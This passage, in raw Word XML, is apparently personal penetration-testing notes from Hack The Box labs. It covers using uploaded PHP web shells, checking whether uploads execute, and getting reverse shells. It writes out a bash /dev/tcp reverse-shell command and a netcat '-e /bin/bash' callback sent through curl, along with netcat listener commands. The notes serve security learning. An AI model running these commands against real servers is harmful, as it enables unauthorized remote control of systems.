          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000105F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How use use Web Shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you get a webshell, use it in the URL as such: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?cmd=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001061">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/shell.php?cmd=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001062">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001063">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you upload a reverse shell to a web server and then access it using RFI, here's how to check if it accepts executable files, or only plain text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001064">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="897"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php echo "RFI test successful"; ?&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001065">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001066">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to reverse shell from a web shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001067">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Validation HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001068">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First find a way to inject a webshell into something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001069">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means you can run commands like this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://10.10.11.116/shell.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If your commands don't work, try using the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--data-urlencode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.11/project/uploads/users/420919-backdoor.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--data-urlencode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "cmd=which nc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nlvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[target IP]/shell.php --data-urlencode 'cmd=bash -c "bash -i &gt;&amp; /dev/tcp/[local IP]/[listening port] 0&gt;&amp;1"'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace shell.php with whatever web shell file you did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000106F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also check if netcat is installed, and if it is, we can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001070">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if netcat is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001071">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[target IP]/shell.php --data-urlencode "cmd=which nc"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001072">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it outputs a file path, then net cat is installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001074">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nlvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="898"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[target IP]/shell.php --data-urlencode "cmd=nc -nv </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.129 4444 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e /bin/bash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001077">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001078">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading PHP reverse shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001079">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can test to see PHP file uploads are allowed and will run the PHP code by uploading the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000107A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "&lt;?php phpinfo(); ?&gt;" &gt; test.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000107B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This puts the payload into a file called test.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000107C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If upon running we see the phpinfo() output, we know it is vulnerable to PHP payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000107D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you upload them, they might not run immediately. They might sometimes just be stored. So, you will have to find out where they are located, and you can do this by URL path enumeration. You might find something like /uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000107E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And even if /uploads is forbidden and doesn't allow access, you can just try accessing it like: http://[IP]/uploads/file_name.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000107F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="661"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then even if the website doesn't load, check your listener to see if it worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001080">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001081">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001082">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a step by step process of how to get reverse shell when we are allowed to upload files to a web server but the files aren't run (PHP). This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base Tier 2 Starting point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001083">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001084">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Spoiler: It actually just works fine if you upload a reverse shell and then open the reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001085">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we have to find out where the files are uploaded. In the HTB, they are uploaded to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/_uploaded</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can find this from using ffuf and looking for any directories related to uploading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001087">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "&lt;?php phpinfo(); ?&gt;" &gt; test.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this command to test if we are allowed to run php files, and if we are able to execute the files. This should display the phpinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001089">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the file test.php, and then try running the file. In HTB, we could go to /_uploaded and then just click on the file</w:t>
      </w:r>
    </w:p>
